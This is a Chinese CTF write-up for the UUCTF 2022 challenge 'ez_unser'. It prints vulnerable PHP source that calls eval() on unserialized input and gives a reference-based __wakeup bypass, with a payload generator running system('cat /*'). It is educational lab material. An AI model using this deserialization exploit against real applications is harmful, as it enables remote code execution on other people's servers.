[UUCTF 2022 新生赛]ez_unser

已于 2024-05-13 07:23:40 修改
阅读量327 收藏
点赞数 1
分类专栏: 反序列化 文章标签: web安全 网络安全 反序列化 php
于 2024-05-12 21:22:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangzhemvp/article/details/138767678
版权 
<?php
show_source(__FILE__);

###very___so___easy!!!!
class test{
    public $a;
    public $b;
    public $c;
    public function __construct(){
        $this->a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确!!!搞什么!!");
}
$bbb=unserialize($_GET['a']);

正常序列化出来是O:4:"test":3:{s:1:"a";s:18:"system(cat /flag);";s:1:"b";i:2;s:1:"c";i:3;} 

if(!preg_match('/test":3/i',$a)) 序列化里面要有 "test":3 ,但又要绕过__wakeup(),这显然冲突了。

改不了变量属性,$a肯定会被' '覆盖,那怎么办呢?

把a的地址给到b,然后在把正确的内容给到c,因为有$this->b=$this->c

<?php
class test{
    public $a;
    public $b;
    public $c="system('cat /*');";
}

$a=new test();
$a->b=&$a->a;
echo serialize($a);
?>

shiyispoder
关注
专栏目录
[HNCTF 2022 WEEK2]easy_unser - 反序列化(wakeup绕过&目录绕过)
oZuoShen123的博客
10-07 1032
2、起始:body(__construct)、终点:body(__destruct),中间需要绕过__wakeup()1、题目干扰字符太多了,其实简化之后的代码差不多这样。
【DASCTF中北大学】EasyUnser PHP反序列化字符串逃逸
_Kisaragi_的博客
06-07 390
题目 <?php include_once 'flag.php'; highlight_file(__FILE__); // Security filtering function function filter($str){ return str_replace('secure', 'secured', $str); } class Hacker{ public $username = 'margin';
NSS [UUCTF 2022 新生]ez_unser
Jay17的博客
07-04 903
NSS [UUCTF 2022 新生]ez_unser
[UUCTF 2022]ez_user
ShangYaoPaiGu的博客
12-07 305
进入环境,获得源码: 审计源码,为php反序列化这里首先想到的是利用CVE-2016-7124,后面发现不成功,看了下题目的环境:题目为,而该漏洞利用的条件是那只能换一种思路。题目中php函数的触发顺序为: 变量在wakeup中被置空了,所以在中想要执行提前构造好的a,只能利用 这条语句,也就是将和“链接”起来: 这样在被设置为空字符串之后,通过重新赋予我们构造好的命令进行执行。构造代码如下: 传入参数a= 得到: flag文件为fffffffffflagafag所以最终exp为: payload:
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生]ez_rce
weixin_46497491的博客
11-07 4182
[SWPUCTF 2022 新生]ez_rce、[NSSRound#4 SWPU]ez_rce
[SWPUCTF 2022 新生]1z_unserialize和[SWPUCTF 2022 新生]ez_1zpo
m0_73700261的博客
04-26 990
得到以下payload=O:3:"lyh":3:{s:3:"url";s:3:"lly";以及这里有个wakeup的绕过,以及这里需要一个assert的函数不知道为啥要它,以及里边有一个md5的弱比较,绕过这三个就能够正常的命令执行了。[SWPUCTF 2022 新生]1z_unserialize。接着在另外给自己传参一个参数,在这个参数里做命令执行。[SWPUCTF 2022 新生]ez_1zpo。这个题目是一题很标准的反序列化,在根目录下边找到flag的文件。这个是构造的pop链。
[BJDCTF2020]EzPHP&DASCTF-sep:hellounser
weixin_47813861的博客
10-03 600
EzPHP 查看源码,然后base32解密一下进入对应文件。 无语的是环境应该是出了问题,一上来就报“fxck”,导致那串代码根本没法绕过。最后破案了,需要把cookie清理一下。 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<b
Fractual_Toolbox.rar_Fractual_Toolb_frtoolbox_wfbm matlab_分形算法
07-14
在提供的压缩包中,`www.pudn.com.txt` 可能是下载来源的说明或者链接,其他如 `Veitch`, `Matlab`, `Jean-Francois`, `Paxson`, `Unser Blu`, `Stoev` 可能是指作者或贡献者的名字,也可能是包含具体算法实现的...
ComponentOne_crack
08-30
1. Extract C1LicenseActivationC.exe and c1sa2.dll to C:\Program Files\Common Files\ComponentOne Shared ...3. Enter any unser name and a company 请按照以上步骤操作,保证成功,成功后不会再跳窗
github-fessen:Unser Familien-Freitagsessen
03-02
【标题】"github-fessen:Unser Familien-Freitagsessen" 提供的信息看起来与一个项目或活动有关,可能是某个家庭或团队在周五共享食谱或烹饪经验的平台。然而,由于信息有限,我们将主要关注与给定标签"Java"相关的...
CTF之旅WEB篇(3)--ezunser PHP反序列化
shutTD的博客
10-01 1412
总的来说这道题思路还是很清晰的,是算偏易的题了不过新手拿来练手还是可以的逻辑很清晰,建议看完这篇文章后自己再试着做一遍哦!
WebUUCTF 2022 新生 个人复现
uuzeray的博客
12-01 1028
Apache解析漏洞主要是因为Apache默认一个文件可以有多个用.分割得后缀,当最右边的后缀无法识别(mime.types文件中的为合法后缀)则继续向左看,直到碰到合法后缀才进行解析(以最后一个合法后缀为准),可用来绕过黑名单过滤。因此md5[0]应该传入%0a0e215962017,但是我们又多了一个%0a 换行符,通过上面这行代码 $md5[0]=substr($md5[0],$sub);$md5[1]===$guessmd5,后者是1秒一变的,得写脚本了。
2022 UUCTF Web
weixin_63231007的博客
12-19 2736
2022UUCTF web部分题分析
[SWPUCTF 2022 新生]ez_ez_unserialize
2301_80553405的博客
02-12 697
创造类x,定义了一个魔术常量x为_FILE_,有定义了几个函数,construct函数让x类中的常量x赋值,wakeup让x重新赋值为_FULE_,destruct函数高亮x常量,如果传参x存在反序列化,否则输出。修改为O:1:"X":2:{s:1:"x";看到提示flag在fllllllag.php中,将代码复制,删掉没有的,加上x序列化。由于要绕过wakeup函数,只要序列化的中的成员数大于实际成员数,即可绕过。打开后是段php代码。
php反序列化漏洞详解
最新发布
apple_74953689的博客
07-26 821
以上代码在反序列化之后,会触发__destruct()魔术方法,该方法中有命令执行函数eval(),又因为反序列化生成的对象里的值,由反序列化里的值提供;**注意:**序列化之后长度s获取的字符串的长度一定为s,否则会继续往后读,并且unserialize会把多余的字符串当垃圾处理,在{}内的就是正确的,{}后面的就都被丢弃。3、而调用__call方法的前提是在对象上下文中调用不存在的方法,刚好__destruct方法调用了一个不存在的函数,而__destruct方法在对象被销毁时触发。
反序列化中_wakeup的绕过
rev1ve的博客
09-05 2243
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
PHP反序列化刷题
mo2901600657的博客
11-20 261
那么为了维持元素个数为三,就要再添加两个元素。$_SESSION['img']=base64_encode('d0g3_f1ag.php') (变量不可控)$_SESSION['user']和$_SESSION['function']可通并进行了序列化和反序列化。倒推:$userinfo['img']=base64_encode('d0g3_f1ag.php')让输出报错:O:4:"xctf":2:{s:4:"flag";明显要元素个数一直为3,改变img的值,需要把原本的img那段吐出来。
NSSCTF2022部分WP
y2xsec的博客
11-02 1266
NSSCTF部分题解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值